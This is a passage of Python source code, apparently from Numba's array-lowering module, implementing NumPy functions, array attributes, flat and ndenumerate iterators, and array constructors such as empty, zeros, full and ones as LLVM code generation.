for index, val in numpy.ndenumerate(arr):
out[index] = numpy.round(val, decimals)
return out
res = context.compile_internal(builder, array_round_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Array))
def array_sinc(context, builder, sig, args):
def array_sinc_impl(arr):
out = numpy.zeros_like(arr)
for index, val in numpy.ndenumerate(arr):
out[index] = numpy.sinc(val)
return out
res = context.compile_internal(builder, array_sinc_impl, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.sinc, types.Kind(types.Number))
def scalar_sinc(context, builder, sig, args):
scalar_dtype = sig.return_type
def scalar_sinc_impl(val):
if numpy.fabs(val) == 0.e0: # to match np impl
val = 1e-20
val *= numpy.pi # np sinc is the normalised variant
return numpy.sin(val)/val
    res = context.compile_internal(builder, scalar_sinc_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
@builtin
@implement(numpy.nonzero, types.Kind(types.Array))
@implement("array.nonzero", types.Kind(types.Array))
@implement(numpy.where, types.Kind(types.Array))
def array_nonzero(context, builder, sig, args):
aryty = sig.args[0]
    # Return type is an N-tuple of 1D C-contiguous arrays
retty = sig.return_type
outaryty = retty.dtype
ndim = aryty.ndim
nouts = retty.count
ary = make_array(aryty)(context, builder, args[0])
shape = cgutils.unpack_tuple(builder, ary.shape)
strides = cgutils.unpack_tuple(builder, ary.strides)
data = ary.data
layout = aryty.layout
# First count the number of non-zero elements
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
count = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
builder.store(builder.add(builder.load(count), one), count)
# Then allocate output arrays of the right size
out_shape = (builder.load(count),)
outs = [_empty_nd_impl(context, builder, outaryty, out_shape)._getvalue()
for i in range(nouts)]
outarys = [make_array(outaryty)(context, builder, out) for out in outs]
out_datas = [out.data for out in outarys]
# And fill them up
index = cgutils.alloca_once_value(builder, zero)
with cgutils.loop_nest(builder, shape, zero.type) as indices:
ptr = cgutils.get_item_pointer2(builder, data, shape, strides,
layout, indices)
val = load_item(context, builder, aryty, ptr)
nz = context.is_true(builder, aryty.dtype, val)
with builder.if_then(nz):
# Store element indices in output arrays
if not indices:
# For a 0-d array, store 0 in the unique output array
indices = (zero,)
cur = builder.load(index)
for i in range(nouts):
ptr = cgutils.get_item_pointer2(builder, out_datas[i],
out_shape, (),
'C', [cur])
store_item(context, builder, outaryty, indices[i], ptr)
builder.store(builder.add(cur, one), index)
tup = context.make_tuple(builder, sig.return_type, outs)
return impl_ret_new_ref(context, builder, sig.return_type, tup)
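# NumPy-level behaviour being implemented here (illustrative):
#   >>> numpy.nonzero(numpy.array([[1, 0], [0, 2]]))
#   (array([0, 1]), array([0, 1]))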
@builtin
@implement(numpy.where, types.Kind(types.Array),
types.Kind(types.Array), types.Kind(types.Array))
def array_where(context, builder, sig, args):
layouts = set(a.layout for a in sig.args)
if layouts == set('C'):
# Faster implementation for C-contiguous arrays
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
cf = cond.flat
xf = x.flat
yf = y.flat
rf = res.flat
for i in range(cond.size):
rf[i] = xf[i] if cf[i] else yf[i]
return res
else:
def where_impl(cond, x, y):
shape = cond.shape
if x.shape != shape or y.shape != shape:
raise ValueError("all inputs should have the same shape")
res = numpy.empty_like(x)
for idx, c in numpy.ndenumerate(cond):
res[idx] = x[idx] if c else y[idx]
return res
res = context.compile_internal(builder, where_impl, sig, args)
return impl_ret_untracked(context, builder, sig.return_type, res)
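# Behaviour note (illustrative): unlike NumPy proper, no broadcasting is
# performed here; all three arguments must share a single shape or a
# ValueError is raised (see the shape checks in both implementations).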
#-------------------------------------------------------------------------------
# Array attributes
@builtin_attr
@impl_attribute(types.Kind(types.Array), "dtype", types.Kind(types.DType))
def array_dtype(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "shape", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "shape", types.Kind(types.UniTuple))
def array_shape(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.shape
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "strides", types.Kind(types.UniTuple))
@impl_attribute(types.Kind(types.MemoryView), "strides", types.Kind(types.UniTuple))
def array_strides(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.strides
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ndim", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "ndim", types.intp)
def array_ndim(context, builder, typ, value):
res = context.get_constant(types.intp, typ.ndim)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "size", types.intp)
def array_size(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.nitems
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "itemsize", types.intp)
@impl_attribute(types.Kind(types.MemoryView), "itemsize", types.intp)
def array_itemsize(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = array.itemsize
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "nbytes", types.intp)
def array_nbytes(context, builder, typ, value):
"""
nbytes = size * itemsize
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
res = builder.mul(array.nitems, array.itemsize)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "contiguous", types.boolean)
def array_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "c_contiguous", types.boolean)
def array_c_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_c_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "f_contiguous", types.boolean)
def array_f_contiguous(context, builder, typ, value):
res = context.get_constant(types.boolean, typ.is_f_contig)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.MemoryView), "readonly", types.boolean)
def array_readonly(context, builder, typ, value):
res = context.get_constant(types.boolean, not typ.mutable)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "ctypes",
types.Kind(types.ArrayCTypes))
def array_ctypes(context, builder, typ, value):
arrayty = make_array(typ)
array = arrayty(context, builder, value)
# Cast void* data to uintp
addr = builder.ptrtoint(array.data, context.get_value_type(types.uintp))
# Create new ArrayCType structure
ctinfo_type = cgutils.create_struct_proxy(types.ArrayCTypes(typ))
ctinfo = ctinfo_type(context, builder)
ctinfo.data = addr
res = ctinfo._getvalue()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flags", types.Kind(types.ArrayFlags))
def array_flags(context, builder, typ, value):
res = context.get_dummy_value()
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayCTypes), "data", types.uintp)
def array_ctypes_data(context, builder, typ, value):
ctinfo_type = cgutils.create_struct_proxy(typ)
ctinfo = ctinfo_type(context, builder, value=value)
res = ctinfo.data
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "contiguous", types.boolean)
@impl_attribute(types.Kind(types.ArrayFlags), "c_contiguous", types.boolean)
def array_flags_contiguous(context, builder, typ, value):
val = typ.array_type.layout == 'C'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute(types.Kind(types.ArrayFlags), "f_contiguous", types.boolean)
def array_flags_f_contiguous(context, builder, typ, value):
layout = typ.array_type.layout
val = layout == 'F' if typ.array_type.ndim > 1 else layout in 'CF'
res = context.get_constant(types.boolean, val)
return impl_ret_untracked(context, builder, typ, res)
@builtin_attr
@impl_attribute_generic(types.Kind(types.Array))
def array_record_getattr(context, builder, typ, value, attr):
"""
Generic getattr() implementation for record arrays: fetch the given
record member, i.e. a subarray.
"""
arrayty = make_array(typ)
array = arrayty(context, builder, value)
rectype = typ.dtype
if not isinstance(rectype, types.Record):
raise AttributeError("attribute %r of %s not defined" % (attr, typ))
dtype = rectype.typeof(attr)
offset = rectype.offset(attr)
resty = typ.copy(dtype=dtype, layout='A')
raryty = make_array(resty)
rary = raryty(context, builder)
constoffset = context.get_constant(types.intp, offset)
llintp = context.get_value_type(types.intp)
newdata = builder.add(builder.ptrtoint(array.data, llintp), constoffset)
newdataptr = builder.inttoptr(newdata, rary.data.type)
datasize = context.get_abi_sizeof(context.get_data_type(dtype))
populate_array(rary,
data=newdataptr,
shape=array.shape,
strides=array.strides,
itemsize=context.get_constant(types.intp, datasize),
meminfo=array.meminfo,
parent=array.parent)
res = rary._getvalue()
return impl_ret_borrowed(context, builder, typ, res)
#-------------------------------------------------------------------------------
# Comparisons
@builtin
@implement('is', types.Kind(types.Array), types.Kind(types.Array))
def array_is(context, builder, sig, args):
aty, bty = sig.args
if aty != bty:
return cgutils.false_bit
def array_is_impl(a, b):
return (a.shape == b.shape and
a.strides == b.strides and
a.ctypes.data == b.ctypes.data)
return context.compile_internal(builder, array_is_impl, sig, args)
#-------------------------------------------------------------------------------
# builtin `numpy.flat` implementation
def make_array_flat_cls(flatiterty):
"""
Return the Structure representation of the given *flatiterty* (an
instance of types.NumpyFlatType).
"""
return _make_flattening_iter_cls(flatiterty, 'flat')
def make_array_ndenumerate_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdEnumerateType).
"""
return _make_flattening_iter_cls(nditerty, 'ndenumerate')
def _increment_indices(context, builder, ndim, shape, indices, end_flag=None):
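    # Odometer-style increment: bump the innermost index first and carry
    # into outer dimensions on wrap-around; when every dimension wraps,
    # the optional end_flag is set to signal exhaustion.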
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end_increment')
if end_flag is not None:
builder.store(cgutils.false_byte, end_flag)
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = increment_index(builder, builder.load(idxptr))
count = shape[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
builder.store(idx, idxptr)
builder.branch(bbend)
builder.store(zero, idxptr)
if end_flag is not None:
builder.store(cgutils.true_byte, end_flag)
builder.branch(bbend)
builder.position_at_end(bbend)
def _increment_indices_array(context, builder, arrty, arr, indices, end_flag=None):
shape = cgutils.unpack_tuple(builder, arr.shape, arrty.ndim)
_increment_indices(context, builder, arrty.ndim, shape, indices, end_flag)
def make_ndindex_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdIndexType).
"""
ndim = nditerty.ndim
class NdIndexIter(cgutils.create_struct_proxy(nditerty)):
"""
.ndindex() implementation.
"""
def init_specific(self, context, builder, shapes):
zero = context.get_constant(types.intp, 0)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
ndim))
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic.
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.exhausted = exhausted
self.shape = cgutils.pack_array(builder, shapes, zero.type)
def iternext_specific(self, context, builder, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
exhausted = cgutils.as_bool_bit(builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, exhausted):
result.set_valid(False)
builder.branch(bbend)
indices = [builder.load(cgutils.gep_inbounds(builder, self.indices, dim))
for dim in range(ndim)]
for load in indices:
mark_positive(builder, load)
result.yield_(cgutils.pack_array(builder, indices, zero.type))
result.set_valid(True)
shape = cgutils.unpack_tuple(builder, self.shape, ndim)
_increment_indices(context, builder, ndim, shape,
self.indices, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
return NdIndexIter
def _make_flattening_iter_cls(flatiterty, kind):
assert kind in ('flat', 'ndenumerate')
array_type = flatiterty.array_type
dtype = array_type.dtype
if array_type.layout == 'C':
class CContiguousFlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
.flat() / .ndenumerate() implementation for C-contiguous arrays.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
self.index = cgutils.alloca_once_value(builder, zero)
# We can't trust strides[-1] to always contain the right
# step value, see
# http://docs.scipy.org/doc/numpy-dev/release.html#npy-relaxed-strides-checking
self.stride = arr.itemsize
if kind == 'ndenumerate':
# Zero-initialize the indices array.
indices = cgutils.alloca_once(
builder, zero.type,
size=context.get_constant(types.intp, arrty.ndim))
for dim in range(arrty.ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
self.indices = indices
# NOTE: Using gep() instead of explicit pointer addition helps
# LLVM vectorize the loop (since the stride is known and
# constant). This is not possible in the non-contiguous case,
# where the strides are unknown at compile-time.
def iternext_specific(self, context, builder, arrty, arr, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
ndim = arrty.ndim
nitems = arr.nitems
index = builder.load(self.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with cgutils.if_likely(builder, is_valid):
ptr = builder.gep(arr.data, [index])
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate(): fetch and increment indices
indices = self.indices
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
_increment_indices_array(context, builder, arrty, arr, indices)
index = builder.add(index, one)
builder.store(index, self.index)
def getitem(self, context, builder, arrty, arr, index):
ptr = builder.gep(arr.data, [index])
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = builder.gep(arr.data, [index])
store_item(context, builder, arrty, value, ptr)
return CContiguousFlatIter
else:
class FlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
Generic .flat() / .ndenumerate() implementation for
non-contiguous arrays.
It keeps track of pointers along each dimension in order to
minimize computations.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
data = arr.data
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
arrty.ndim))
pointers = cgutils.alloca_once(builder, data.type,
size=context.get_constant(types.intp,
arrty.ndim))
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
# Initialize indices and pointers with their start values.
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
builder.store(data, ptrptr)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic (see issue #846).
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.pointers = pointers
self.exhausted = exhausted
def iternext_specific(self, context, builder, arrty, arr, result):
ndim = arrty.ndim
data = arr.data
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
indices = self.indices
pointers = self.pointers
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
# Catch already computed iterator exhaustion
is_exhausted = cgutils.as_bool_bit(
builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, is_exhausted):
result.set_valid(False)
builder.branch(bbend)
result.set_valid(True)
# Current pointer inside last dimension
last_ptr = cgutils.gep_inbounds(builder, pointers, ndim - 1)
ptr = builder.load(last_ptr)
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate() => yield (indices, value)
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
# Update indices and pointers by walking from inner
# dimension to outer.
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = builder.add(builder.load(idxptr), one)
count = shapes[dim]
stride = strides[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
# Index is valid => pointer can simply be incremented.
builder.store(idx, idxptr)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
ptr = builder.load(ptrptr)
ptr = cgutils.pointer_add(builder, ptr, stride)
builder.store(ptr, ptrptr)
# Reset pointers in inner dimensions
for inner_dim in range(dim + 1, ndim):
ptrptr = cgutils.gep_inbounds(builder, pointers, inner_dim)
builder.store(ptr, ptrptr)
builder.branch(bbend)
# Reset index and continue with next dimension
builder.store(zero, idxptr)
# End of array
builder.store(cgutils.true_byte, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
def _ptr_for_index(self, context, builder, arrty, arr, index):
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, count=ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, count=ndim)
# First convert the flattened index into a regular n-dim index
indices = []
for dim in reversed(range(ndim)):
indices.append(builder.urem(index, shapes[dim]))
index = builder.udiv(index, shapes[dim])
indices.reverse()
ptr = cgutils.get_item_pointer2(builder, arr.data, shapes,
strides, arrty.layout, indices)
return ptr
def getitem(self, context, builder, arrty, arr, index):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
store_item(context, builder, arrty, value, ptr)
return FlatIter
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flat", types.Kind(types.NumpyFlatType))
def make_array_flatiter(context, builder, arrty, arr):
flatitercls = make_array_flat_cls(types.NumpyFlatType(arrty))
flatiter = flatitercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
flatiter.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
flatiter.init_specific(context, builder, arrty, arr)
res = flatiter._getvalue()
return impl_ret_borrowed(context, builder, types.NumpyFlatType(arrty), res)
@builtin
@implement('iternext', types.Kind(types.NumpyFlatType))
@iternext_impl
def iternext_numpy_flatiter(context, builder, sig, args, result):
[flatiterty] = sig.args
[flatiter] = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
flatiter.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement('getitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer))
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.getitem(context, builder, arrty, arr, index)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer),
types.Any)
def iternext_numpy_setitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index, value = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.setitem(context, builder, arrty, arr, index, value)
return context.get_dummy_value()
@builtin
@implement(numpy.ndenumerate, types.Kind(types.Array))
def make_array_ndenumerate(context, builder, sig, args):
arrty, = sig.args
arr, = args
nditercls = make_array_ndenumerate_cls(types.NumpyNdEnumerateType(arrty))
nditer = nditercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
nditer.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
nditer.init_specific(context, builder, arrty, arr)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdEnumerateType))
@iternext_impl
def iternext_numpy_nditer(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_array_ndenumerate_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
arrty = nditerty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(nditer.array))
nditer.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement(numpy.ndindex, types.VarArg(types.Kind(types.Integer)))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(*shape)"""
shape = [context.cast(builder, arg, argty, types.intp)
for argty, arg in zip(sig.args, args)]
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ndindex, types.Kind(types.BaseTuple))
def make_array_ndindex_tuple(context, builder, sig, args):
"""ndindex(shape)"""
ndim = sig.return_type.ndim
if ndim > 0:
idxty = sig.args[0].dtype
tup = args[0]
shape = cgutils.unpack_tuple(builder, tup, ndim)
shape = [context.cast(builder, idx, idxty, types.intp)
for idx in shape]
else:
shape = []
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdIndexType))
@iternext_impl
def iternext_numpy_ndindex(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_ndindex_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
nditer.iternext_specific(context, builder, result)
# -----------------------------------------------------------------------------
# Numpy array constructors
def _empty_nd_impl(context, builder, arrtype, shapes):
"""Utility function used for allocating a new array during LLVM code
generation (lowering). Given a target context, builder, array
type, and a tuple or list of lowered dimension sizes, returns a
LLVM value pointing at a Numba runtime allocated array.
"""
arycls = make_array(arrtype)
ary = arycls(context, builder)
datatype = context.get_data_type(arrtype.dtype)
itemsize = context.get_constant(types.intp,
context.get_abi_sizeof(datatype))
# compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
if arrtype.ndim == 0:
strides = ()
elif arrtype.layout == 'C':
strides = [itemsize]
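        # Row-major: the innermost stride equals itemsize and outer strides
        # are running products; e.g. shape (2, 3, 4) with an 8-byte dtype
        # gives strides (96, 32, 8).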
for dimension_size in reversed(shapes[1:]):
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(reversed(strides))
elif arrtype.layout == 'F':
strides = [itemsize]
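        # Column-major: e.g. shape (2, 3, 4) with an 8-byte dtype gives
        # strides (8, 16, 48).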
for dimension_size in shapes[:-1]:
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(strides)
else:
raise NotImplementedError(
"Don't know how to allocate array with layout '{0}'.".format(
arrtype.layout))
allocsize = builder.mul(itemsize, arrlen)
# NOTE: AVX prefer 32-byte alignment
meminfo = context.nrt_meminfo_alloc_aligned(builder, size=allocsize,
align=32)
data = context.nrt_meminfo_data(builder, meminfo)
intp_t = context.get_value_type(types.intp)
shape_array = cgutils.pack_array(builder, shapes, ty=intp_t)
strides_array = cgutils.pack_array(builder, strides, ty=intp_t)
populate_array(ary,
data=builder.bitcast(data, datatype.as_pointer()),
shape=shape_array,
strides=strides_array,
itemsize=itemsize,
meminfo=meminfo)
return ary
def _zero_fill_array(context, builder, ary):
"""
Zero-fill an array. The array must be contiguous.
"""
cgutils.memset(builder, ary.data, builder.mul(ary.itemsize, ary.nitems), 0)
def _parse_empty_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty(), np.zeros() or np.ones() call.
"""
arrshapetype = sig.args[0]
arrshape = args[0]
arrtype = sig.return_type
if isinstance(arrshapetype, types.Integer):
ndim = 1
shapes = [context.cast(builder, arrshape, arrshapetype, types.intp)]
else:
ndim = arrshapetype.count
arrshape = context.cast(builder, arrshape, arrshapetype,
types.UniTuple(types.intp, ndim))
shapes = cgutils.unpack_tuple(builder, arrshape, count=ndim)
zero = context.get_constant_generic(builder, types.intp, 0)
for dim in range(ndim):
is_neg = builder.icmp_signed('<', shapes[dim], zero)
with cgutils.if_unlikely(builder, is_neg):
context.call_conv.return_user_exc(builder, ValueError,
("negative dimensions not allowed",))
return arrtype, shapes
def _parse_empty_like_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty_like(), np.zeros_like() or
np.ones_like() call.
"""
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape, count=arytype.ndim)
return sig.return_type, shapes
@builtin
@implement(numpy.empty, types.Any)
@implement(numpy.empty, types.Any, types.Any)
def numpy_empty_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.empty_like, types.Kind(types.Array))
@implement(numpy.empty_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_empty_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros, types.Any)
@implement(numpy.zeros, types.Any, types.Any)
def numpy_zeros_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros_like, types.Kind(types.Array))
@implement(numpy.zeros_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_zeros_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
if numpy_version >= (1, 8):
@builtin
@implement(numpy.full, types.Any, types.Any)
def numpy_full_nd(context, builder, sig, args):
def full(shape, value):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full, types.Any, types.Any, types.Kind(types.DTypeSpec))
def numpy_full_dtype_nd(context, builder, sig, args):
def full(shape, value, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any)
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any, types.Kind(types.DTypeSpec))
    def numpy_full_like_dtype_nd(context, builder, sig, args):
def full_like(arr, value, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any)
def numpy_ones_nd(context, builder, sig, args):
def ones(shape):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
    res = context.compile_internal(builder, ones, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any, types.Kind(types.DTypeSpec))
def numpy_ones_dtype_nd(context, builder, sig, args):
def ones(shape, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array))
